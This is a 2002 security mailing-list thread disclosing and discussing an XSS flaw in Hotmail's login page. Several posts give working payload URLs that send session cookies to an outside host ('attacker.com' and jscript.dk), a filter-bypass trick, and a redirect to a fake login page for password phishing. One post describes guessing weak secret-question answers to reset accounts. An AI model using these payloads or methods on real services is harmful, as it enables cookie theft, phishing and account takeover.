Re: XSS bug in hotmail login page
Hi Everyone,
MSN passport (read Microsoft)'s basic mentality itself about security is
very insecure. In November 2001 and april 2002, when some security bugs were
mentioned, MSN did patch some of their systems. But surprisingly, we found
many of the systems still used the buggy techniques, say, Javascript, within
their own pages. Even as today, when one opens MSN Hotmail in IE6, it many a
times says Script Error (or something similar). Can't they make their own
mail system compatible with their own Browser?
Other issues we observed but kept silent were:
a) When MS transitioned from MS hotmail to MSN hotmail, they reset all
users' options to somewhat insecure settings. I am unaware if any warning or
alert was sent before doing so. The settings affected were (still are, and
maybe are default settings for new accounts):
(Under Personal Profile...)
1. Share my e-mail address.
2. Share my first and last names.
3. Share my other registration information.
The above three options are enabled by default. I
assume that these maybe a prime source of leaking informatin to spammers,
besides other security risks. If you have these options enabled, Disable
them NOW!
(Under Other Options...)
4. Session Expiration is set to NEVER. Probably, if session
expiration is
set to the minimum available 2 hours, chances of others getting into your
hotmail
accounts become less.
B) The change password policy: Hotmails Reset Password option can be used by
any user, as long as the account holder is not in the US, that is, his/her
location is not set at US. This is because when the "forgot password" option
is invoked (and a secret question is present in the database), the next step
asks for the username and country. If the country is not US, then a third
field, ZIP CODE is skipped and the secret question page is shown. Of course
one has to know the answer to the question but then, MS has provided enough
freedom to users to type in any question they like. During our research, we
found questions like "How are you?" and "Whom do you love most?". Anyone's
guess, we found answers to be like "Fine" (or "Bad" or "Not Good") and "me"
("or myself" or "my lover") respectively. The answers in brackets are the
next-possible-answers but we could guess, at the most, in second attempt
only.
Time to change hotmail policies??
With warms regards and best wishes.
Inderjeet S Sodhi
Infotech Consultant, E-Security and S/W Solution Provider,
Web Designer and Beta Tester.
- Original Message -
From: "Russell Harding" <[EMAIL PROTECTED]>
To: "Thor Larholm" <[EMAIL PROTECTED]>
Sent: Tuesday, October 08, 2002 12:20 PM
Subject: RE: XSS bug in hotmail login page
> Hello, comments below:
>
> On Mon, 7 Oct 2002, Thor Larholm wrote:
>
> > It's very simple, you can inject arbitrary scripting to be executed by
the
> > user in the context of hotmail. This means that you can e.g. steal his
> > cookies or, if he's logged in, write emails from his account, delete his
> > mails and change his password.
> >
>
> I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
> from GET requests. While you can view your own cookies easily, I'm not
> sure if you can still exploit this bug. I do know filtering these
> characters prevents this sort of attack:
>
>
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>document.location.replace('http://attacker.com/steal.cgi?'+document.coo
kie);&ct=1033054530&_setlang=
>
> Is there another way to exploit this which I am not seeing? Or does MSN
> actually have their act together (in this particular case...)?
>
>-Russell
>
> P.S. Well, I suppose the real question may be this:
> Is there a way to concatenate javascript strings without "+" or "%2B"?
>
>
>
> On Mon, 7 Oct 2002, Thor Larholm wrote:
>
> > > From: Peter Rdam [mailto:[EMAIL PROTECTED]]
> > > They didnt reacted, and im pretty curious about what
> > > is possible with the bug. And i actually hope that
> > > someone can tell me about it and maybe Microsoft will
> > > do something about it..
> >
> > It's very simple, you can inject arbitrary scripting to be executed by
the
> > user in the context of hotmail. This means that you can e.g. steal his
> > cookies or, if he's logged in, write emails from his account, delete his
> > mails and change his password.
> >
> >
> >
> > Regards
> > Thor Larholm
> > Jubii A/S - Internet Programmer
> >
>
RE: XSS bug in hotmail login page
Hello, comments below:
On Mon, 7 Oct 2002, Thor Larholm wrote:
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests. While you can view your own cookies easily, I'm not
sure if you can still exploit this bug. I do know filtering these
characters prevents this sort of attack:
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);&ct=1033054530&_setlang=
Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?
-Russell
P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?
On Mon, 7 Oct 2002, Thor Larholm wrote:
> > From: Peter Rdam [mailto:[EMAIL PROTECTED]]
> > They didnt reacted, and im pretty curious about what
> > is possible with the bug. And i actually hope that
> > someone can tell me about it and maybe Microsoft will
> > do something about it..
>
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
>
>
> Regards
> Thor Larholm
> Jubii A/S - Internet Programmer
>
Re: XSS bug in hotmail login page
If you can't get spaces in, escape them:
eval(unescape("alert('spaces%20wherever%20you%20want');"));
You can encode any character you want this way.
I have some papers on XSS bugs and their implications and some tips, tricks
and tools online at my website. Might be interresting for all you wannabe
XSS-hackers and anybody who has a website or webbase application to secure
from XSS. http://spoor12.edup.tudelft.nl/
Impact for the hotmail XSS: I wrote a hotmail virus a few months back. It's
written in javascript and it abuses XSS bugs to spread itself to all people
in your addressbook & inbox. It works like a charm on IE and Netscape
(probably Mozilla too). It infects yahoo too (using another, yet
undisclosed, XSS bug in yahoo). I was working on a port to mail.com but got
bored.
Combine this mass-mailer worm with the recent "download and execute any
file" bugs for IE by Jelmer and friends and you've got another mass-mailin',
backdoorin', script-kiddie virus. Only this time it's not just for Outlook
but for any javascript capable browser(!)
So, Amongst the known security problems XSS poses, you can now add that XSS
bugs can lead to infection with a virus and/or a backdoor. (I hope you're
not reading this with webbased hotmail or yahoo ;)
Berend-Jan Wever
<[EMAIL PROTECTED]>
http://spoor12.edup.tudelft.nl/
0x0dd31337 - you know who you are ;)
- Original Message -
From: "Muhammad Faisal Rauf Danka" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, October 08, 2002 14:11
Subject: Re: XSS bug in hotmail login page
> A lot can happen for sure, but i tried one myself, to redirect the request
to some other webpage.
> One can make a fake hotmail page asking for password storing it locally in
a text file and then again redirect to the original hotmail page.
> Usint this method one could steal passwords of hotmail/MSN users.
> We have all see previously people making hotmail looking page, asking you
to first login through it, or asking you to send your login/pass along with
the login name with the person you want to get hacked (all nasty scams like
that).
> Now if it is not fixed they will have an easy way to trick them by asking
them to visit hotmail new policy at :
>
>
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html";);
&ct=1033054530&_setlang=
>
> And then have a fake setup to trick them entering their passwords at:
> http://www.ownhomepage.com/frames/hotmailfake.html
>
>
> Regards
>
> Muhammad Faisal Rauf Danka
>
> Head of GemSEC / Chief Technology Officer
> Gem Internet Services (Pvt) Ltd.
> web: www.gem.net.pk
> Key Id: 0x784B0202
> Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B
> 784B 0202
>
> _
> ---
> [ATTITUDEX.COM]
> http://www.attitudex.com/
> ---
>
> _
> Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No
Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
Re: XSS bug in hotmail login page
A lot can happen for sure, but i tried one myself, to redirect the request to some
other webpage.
One can make a fake hotmail page asking for password storing it locally in a text file
and then again redirect to the original hotmail page.
Usint this method one could steal passwords of hotmail/MSN users.
We have all see previously people making hotmail looking page, asking you to first
login through it, or asking you to send your login/pass along with the login name with
the person you want to get hacked (all nasty scams like that).
Now if it is not fixed they will have an easy way to trick them by asking them to
visit hotmail new policy at :
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html";);&ct=1033054530&_setlang=
And then have a fake setup to trick them entering their passwords at:
http://www.ownhomepage.com/frames/hotmailfake.html
Regards
Muhammad Faisal Rauf Danka
Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B
784B 0202
_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---
_
Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB,
POP & more! http://www.everyone.net/selectmail?campaign=tag
RE: XSS bug in hotmail login page
> From: Russell Harding [mailto:[EMAIL PROTECTED]]
> Is there another way to exploit this which I am not
> seeing? Or does MSN actually have their act together
> (in this particular case...)?
>
> -Russell
>
> P.S. Well, I suppose the real question may be this:
> Is there a way to concatenate javascript strings without "+" or "%2B"?
Sure there is, the first that springs to mind is to use the replace method
which all strings have:
var myString = "hi $".replace('$','monkeyboy');
alert( myString ); // alerts "hi monkeyboy"
The first argument can be both a string or a regular expression.
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>location.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl
ace('$',document.cookie));&ct=1033054530&_setlang=",,-1,0
Regards
Thor Larholm
Jubii A/S - Internet Programmer
RE: XSS bug in hotmail login page
> From: Peter Rdam [mailto:[EMAIL PROTECTED]] > They didnt reacted, and im pretty curious about what > is possible with the bug. And i actually hope that > someone can tell me about it and maybe Microsoft will > do something about it.. It's very simple, you can inject arbitrary scripting to be executed by the user in the context of hotmail. This means that you can e.g. steal his cookies or, if he's logged in, write emails from his account, delete his mails and change his password. Regards Thor Larholm Jubii A/S - Internet Programmer
XSS bug in hotmail login page
Goodevening people, I've found a "little (not sure)" xss bug in the Hotmail login page, i just started to learn about xss bugs. I didnt tryd to much on this, i even contacted Microsoft. They prolly very busy with counting do, or its a harmless bug.. got no idea ;). They didnt reacted, and im pretty curious about what is possible with the bug. And i actually hope that someone can tell me about it and maybe Microsoft will do something about it.. so check it out.. the + sign is filterd out.. and hey be cool.. dunno whats possible with it.. but keep it to exploiting i would say.. Hope someone can explain what is possible with this bug.. im worried about my hotmail addy security (lol) http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>alert(document.cookie)&ct=1033054530&_setlang= Regards, Addic RDMNL P.S. Sorry for my bad englisch :P Nigerian Scam !! READ if you've received a request!! http://www.secretservice.gov/alert419.shtml - Express yourself with a super cool email address from BigMailBox.com. Hundreds of choices. It's free! http://www.bigmailbox.com -
